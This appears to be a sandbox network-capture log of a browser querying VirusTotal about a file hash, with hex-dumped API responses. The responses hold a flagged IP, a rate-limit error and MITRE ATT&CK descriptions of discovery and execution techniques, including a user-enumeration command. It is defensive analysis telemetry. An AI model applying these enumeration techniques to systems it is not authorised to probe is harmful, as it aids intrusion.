                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 61 6c 65 72 74 5f 63 6f 6e 74 65 78 74 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 5f 69 70 22 3a 20 22 35 2e 38 2e 36 33 2e 31 34 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 5f 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 35 2e 38 2e 36 33 2e 31 34 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "alert_context": [ { "dest_ip": "5.8.63.140", "dest_port": 443, "hostname": "5.8.63.140"
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 67 75 69 2f 73 65 61 72 63 68 2f 35 34 63 30 65 37 35 39 33 64 39 34 63 30 33 61 32 62 37 39 30 39 65 36 61 34 35 39 63 65 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 61 6c 65 72 74 5f 63 6f 6e 74 65 78 74 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 72 63 5f 69 70 22 3a 20 22 35 2e 38 2e 36 33 2e 31 34 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "https://www.virustotal.com/gui/search/54c0e7593d94c03a2b7909e6a459ce14" ], "alert_context": [ { "src_ip": "5.8.63.140",


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    153192.168.2.164990274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC964OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_children HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTM2NDU4NDAwNDktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5Nw==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 166a3d19d6d949a80a51cd9ab2039d2e
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:31 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 229
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:31 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC229INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 5d 2c 0a 20 20 20 20 22 6d 65 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 75 6e 74 22 3a 20 30 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 2f 70 65 5f 72 65 73 6f 75 72 63 65 5f 63 68 69 6c 64 72 65 6e 3f 6c 69 6d 69 74 3d 31 30 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": [], "meta": { "count": 0 }, "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_children?limit=10" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    154192.168.2.164990574.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC568OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/execution_parents HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 9bed4dee5777c9962246db13dce74cfd
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:31 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    155192.168.2.164990674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC965OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mitre_trees HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTE0MDUzMTcyMjktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjUwMQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC885INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 2f5878ed50eaddf69ef91867c904344b
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 55373
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC523INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 43 41 50 45 20 53 61 6e 64 62 6f 78 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 61 63 74 69 63 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 54 41 30 30 30 37 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 44 69 73 63 6f 76 65 72 79 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 74 74 61 63 6b 2e 6d 69 74 72 65 2e 6f 72 67 2f 74 61 63 74 69 63 73 2f 54 41 30 30 30 37 2f 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22
                                                                                                                                                                                                                    Data Ascii: { "data": { "CAPE Sandbox": { "tactics": [ { "id": "TA0007", "name": "Discovery", "link": "https://attack.mitre.org/tactics/TA0007/", "
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 6f 72 65 20 64 65 63 69 64 69 6e 67 20 68 6f 77 20 74 6f 20 61 63 74 2e 20 54 68 65 79 20 61 6c 73 6f 20 61 6c 6c 6f 77 20 61 64 76 65 72 73 61 72 69 65 73 20 74 6f 20 65 78 70 6c 6f 72 65 20 77 68 61 74 20 74 68 65 79 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 61 6e 64 20 77 68 61 74 5c 75 32 30 31 39 73 20 61 72 6f 75 6e 64 20 74 68 65 69 72 20 65 6e 74 72 79 20 70 6f 69 6e 74 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 64 69 73 63 6f 76 65 72 20 68 6f 77 20 69 74 20 63 6f 75 6c 64 20 62 65 6e 65 66 69 74 20 74 68 65 69 72 20 63 75 72 72 65 6e 74 20 6f 62 6a 65 63 74 69 76 65 2e 20 4e 61 74 69 76 65 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 20 74 6f 6f 6c 73 20 61 72 65 20 6f 66 74 65 6e 20 75 73 65 64 20 74 6f 77 61 72 64 20 74 68 69 73 20 70 6f 73 74
                                                                                                                                                                                                                    Data Ascii: ore deciding how to act. They also allow adversaries to explore what they can control and what\u2019s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC544INData Raw: 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 68 6f 61 6d 69 2e 20 49 6e 20 6d 61 63 4f 53 20 61 6e 64 20 4c 69 6e 75 78 2c 20 74 68 65 20 63 75 72 72 65 6e 74 6c 79 20 6c 6f 67 67 65 64 20 69 6e 20 75 73 65 72 20 63 61 6e 20 62 65 20 69 64 65 6e 74 69 66 69 65 64 20 77 69 74 68 20 77 20 61 6e 64 20 77 68 6f 2e 20 4f 6e 20 6d 61 63 4f 53 20 74 68 65 20 64 73 63 6c 20 2e 20 6c 69 73 74 20 2f 55 73 65 72 73 20 7c 20 67 72 65 70 20 2d 76 20 27 5f 27 20 63 6f 6d 6d 61 6e 64 20 63 61 6e 20 61 6c 73 6f 20 62 65 20 75 73 65 64 20 74 6f 20 65 6e 75 6d 65 72 61 74 65 20 75 73 65 72 20 61 63 63 6f 75 6e 74 73 2e 20 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 76 61 72 69 61 62 6c 65 73 2c 20 73 75 63 68 20 61 73 20 25 55 53 45 52 4e 41 4d 45
                                                                                                                                                                                                                    Data Ascii: s information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 76 65 72 69 74 79 22 3a 20 22 55 4e 4b 4e 4f 57 4e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 41 64 76 65 72 73 61 72 69 65 73 20 6d 61 79 20 61 74 74 65 6d 70 74 20 74 6f 20 69 64 65 6e 74 69 66 79 20 74 68 65 20 70 72 69 6d 61 72 79 20 75 73 65 72 2c 20 63 75 72 72 65 6e 74 6c 79 20 6c 6f 67 67 65 64 20 69 6e 20 75 73 65 72 2c 20 73 65 74 20 6f 66 20 75 73 65 72 73 20 74 68 61 74 20 63 6f 6d 6d 6f 6e 6c 79 20 75 73 65 73 20 61 20 73 79 73 74 65 6d 2c 20 6f 72 20 77 68 65 74 68 65 72 20 61 20 75 73 65 72 20 69 73 20 61 63 74 69 76 65 6c 79
                                                                                                                                                                                                                    Data Ascii: "severity": "UNKNOWN", "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 67 65 20 61 20 4e 65 74 77 6f 72 6b 20 44 65 76 69 63 65 20 43 4c 49 20 6f 6e 20 6e 65 74 77 6f 72 6b 20 64 65 76 69 63 65 73 20 74 6f 20 67 61 74 68 65 72 20 64 65 74 61 69 6c 65 64 20 73 79 73 74 65 6d 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 65 2e 67 2e 20 73 68 6f 77 20 76 65 72 73 69 6f 6e 29 2e 20 53 79 73 74 65 6d 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 44 69 73 63 6f 76 65 72 79 20 63 6f 6d 62 69 6e 65 64 20 77 69 74 68 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 67 61 74 68 65 72 65 64 20 66 72 6f 6d 20 6f 74 68 65 72 20 66 6f 72 6d 73 20 6f 66 20 64 69 73 63 6f 76 65 72 79 20 61 6e 64 20 72 65 63 6f 6e 6e 61 69 73 73 61 6e 63 65 20 63 61 6e 20 64 72 69 76 65 20 70 61 79 6c 6f 61 64 20 64 65 76 65 6c 6f 70 6d 65 6e 74 20 61 6e 64 20 63 6f 6e 63 65 61
                                                                                                                                                                                                                    Data Ascii: ge a Network Device CLI on network devices to gather detailed system information (e.g. show version). System Information Discovery combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concea
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1280INData Raw: 67 69 73 74 72 79 20 63 6f 6e 74 61 69 6e 73 20 61 20 73 69 67 6e 69 66 69 63 61 6e 74 20 61 6d 6f 75 6e 74 20 6f 66 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 65 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 2c 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2c 20 73 6f 66 74 77 61 72 65 2c 20 61 6e 64 20 73 65 63 75 72 69 74 79 2e 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 63 61 6e 20 65 61 73 69 6c 79 20 62 65 20 71 75 65 72 69 65 64 20 75 73 69 6e 67 20 74 68 65 20 52 65 67 20 75 74 69 6c 69 74 79 2c 20 74 68 6f 75 67 68 20 6f 74 68 65 72 20 6d 65 61 6e 73 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 52 65 67 69 73 74 72 79 20 65 78 69 73 74 2e 20 53 6f 6d 65 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 6d 61 79 20 68 65
                                                                                                                                                                                                                    Data Ascii: gistry contains a significant amount of information about the operating system, configuration, software, and security. Information can easily be queried using the Reg utility, though other means to access the Registry exist. Some of the information may he
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 61 64 76 65 72 73 61 72 79 2d 63 6f 6e 74 72 6f 6c 6c 65 64 20 63 6f 64 65 20 72 75 6e 6e 69 6e 67 20 6f 6e 20 61 20 6c 6f 63 61 6c 20 6f 72 20 72 65 6d 6f 74 65 20 73 79 73 74 65 6d 2e 20 54 65 63 68 6e 69 71 75 65 73 20 74 68 61 74 20 72 75 6e 20 6d 61 6c 69 63 69 6f 75 73 20 63 6f 64 65 20 61 72 65 20 6f 66 74 65 6e 20 70 61 69 72 65 64 20 77 69 74 68 20 74 65 63 68 6e 69 71 75 65 73 20 66 72 6f 6d 20 61 6c 6c 20 6f 74 68 65 72 20 74 61 63 74 69 63 73 20 74 6f 20 61 63 68 69 65 76 65 20 62 72 6f 61 64 65 72 20 67 6f 61 6c 73 2c 20 6c 69 6b 65 20 65 78 70 6c 6f 72 69 6e 67 20 61 20 6e 65 74 77 6f 72 6b 20 6f 72 20 73 74 65 61 6c 69 6e 67 20 64 61 74 61 2e 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 61 6e 20 61 64 76 65 72 73 61 72 79 20 6d 69 67 68 74 20
                                                                                                                                                                                                                    Data Ascii: adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 2c 20 63 6f 6d 6d 6f 6e 20 70 72 61 63 74 69 63 65 20 75 73 65 73 20 2e 64 79 6c 69 62 20 66 69 6c 65 73 2e 5c 6e 54 68 65 20 57 69 6e 64 6f 77 73 20 6d 6f 64 75 6c 65 20 6c 6f 61 64 65 72 20 63 61 6e 20 62 65 20 69 6e 73 74 72 75 63 74 65 64 20 74 6f 20 6c 6f 61 64 20 44 4c 4c 73 20 66 72 6f 6d 20 61 72 62 69 74 72 61 72 79 20 6c 6f 63 61 6c 20 70 61 74 68 73 20 61 6e 64 20 61 72 62 69 74 72 61 72 79 20 55 6e 69 76 65 72 73 61 6c 20 4e 61 6d 69 6e 67 20 43 6f 6e 76 65 6e 74 69 6f 6e 20 28 55 4e 43 29 20 6e 65 74 77 6f 72 6b 20 70 61 74 68 73 2e 20 54 68 69 73 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 72 65 73 69 64 65 73 20 69 6e 20 4e 54 44 4c 4c 2e 64 6c 6c 20 61 6e 64 20 69 73 20 70 61 72 74 20 6f 66 20 74 68 65 20 57 69 6e 64 6f 77 73 20 4e 61 74
                                                                                                                                                                                                                    Data Ascii: , common practice uses .dylib files.\nThe Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Nat
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1280INData Raw: 75 6e 63 74 69 6f 6e 73 20 61 73 20 61 20 6d 65 61 6e 73 20 6f 66 20 65 78 65 63 75 74 69 6e 67 20 62 65 68 61 76 69 6f 72 73 2e 20 53 69 6d 69 6c 61 72 20 74 6f 20 43 6f 6d 6d 61 6e 64 20 61 6e 64 20 53 63 72 69 70 74 69 6e 67 20 49 6e 74 65 72 70 72 65 74 65 72 2c 20 74 68 65 20 6e 61 74 69 76 65 20 41 50 49 20 61 6e 64 20 69 74 73 20 68 69 65 72 61 72 63 68 79 20 6f 66 20 69 6e 74 65 72 66 61 63 65 73 20 70 72 6f 76 69 64 65 20 6d 65 63 68 61 6e 69 73 6d 73 20 74 6f 20 69 6e 74 65 72 61 63 74 20 77 69 74 68 20 61 6e 64 20 75 74 69 6c 69 7a 65 20 76 61 72 69 6f 75 73 20 63 6f 6d 70 6f 6e 65 6e 74 73 20 6f 66 20 61 20 76 69 63 74 69 6d 69 7a 65 64 20 73 79 73 74 65 6d 2e 5c 6e 4e 61 74 69 76 65 20 41 50 49 20 66 75 6e 63 74 69 6f 6e 73 20 28 73 75 63 68
                                                                                                                                                                                                                    Data Ascii: unctions as a means of executing behaviors. Similar to Command and Scripting Interpreter, the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\nNative API functions (such
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 67 20 6d 6f 6e 69 74 6f 72 65 64 20 66 75 6e 63 74 69 6f 6e 73 20 76 69 61 20 44 69 73 61 62 6c 65 20 6f 72 20 4d 6f 64 69 66 79 20 54 6f 6f 6c 73 2e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 67 6e 61 74 75 72 65 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 76 65 72 69 74 79 22 3a 20 22 55 4e 4b 4e 4f 57 4e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 41 64 76 65 72 73 61 72 69 65 73 20 6d
                                                                                                                                                                                                                    Data Ascii: g monitored functions via Disable or Modify Tools.", "signatures": [ { "severity": "UNKNOWN", "description": "Adversaries m


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    156192.168.2.164990774.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC963OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mbc_trees HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTQxMTAyMDY0NzUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjUwMg==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC885INHTTP/1.1 200 OK
